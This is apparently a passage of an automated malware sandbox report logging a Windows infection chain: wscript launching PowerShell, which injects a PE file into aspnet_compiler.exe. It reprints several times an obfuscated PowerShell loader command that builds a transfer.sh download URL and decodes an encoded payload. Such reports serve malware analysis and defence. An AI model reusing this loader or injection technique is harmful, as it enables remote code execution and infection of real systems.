Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7048Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3576Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 4240Thread sleep time: -160000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4419Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4790Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 3562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: threadDelayed 5471
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindow / User API: foregroundWindowGot 615
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeThread delayed: delay time: 922337203685477
Source: aspnet_compiler.exe, 00000019.00000003.454201706.0000000006009000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllgg@I
Source: ModuleAnalysisCache.3.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.3.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: powershell.exe, 00000003.00000003.420392968.000001E0CB860000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%7%SystemRoot%\system32\mswsock.dll!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!
Source: ModuleAnalysisCache.3.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regionsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 402000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 420000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 422000Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 64C008Jump to behavior
Injects a PE file into a foreign processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/ucAlHz/FGTEFRH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-*e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-*%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-*c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-*1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-*e-X-!c-X-*f-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-*e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-*0-X-!5-X-58-X-%8-X-*e-X-*0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-*0-X-*3-X-*0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!*-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!*-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-*5-X-*0-X-57-X-*0-X-%d-X-!f-X-*%-X-*a-X-*0-X-!5-X-%7-X-%9-X-%e-X-5%-X-*5-X-70-X-*c-X-*1-X-*3-X-*5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!*-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!*-X-5*-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!*-X-5*-X-%7-X-%9-X-3b-X-0a-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!*-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!*-X-5*-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-*f-X-*9-X-*e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%*-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
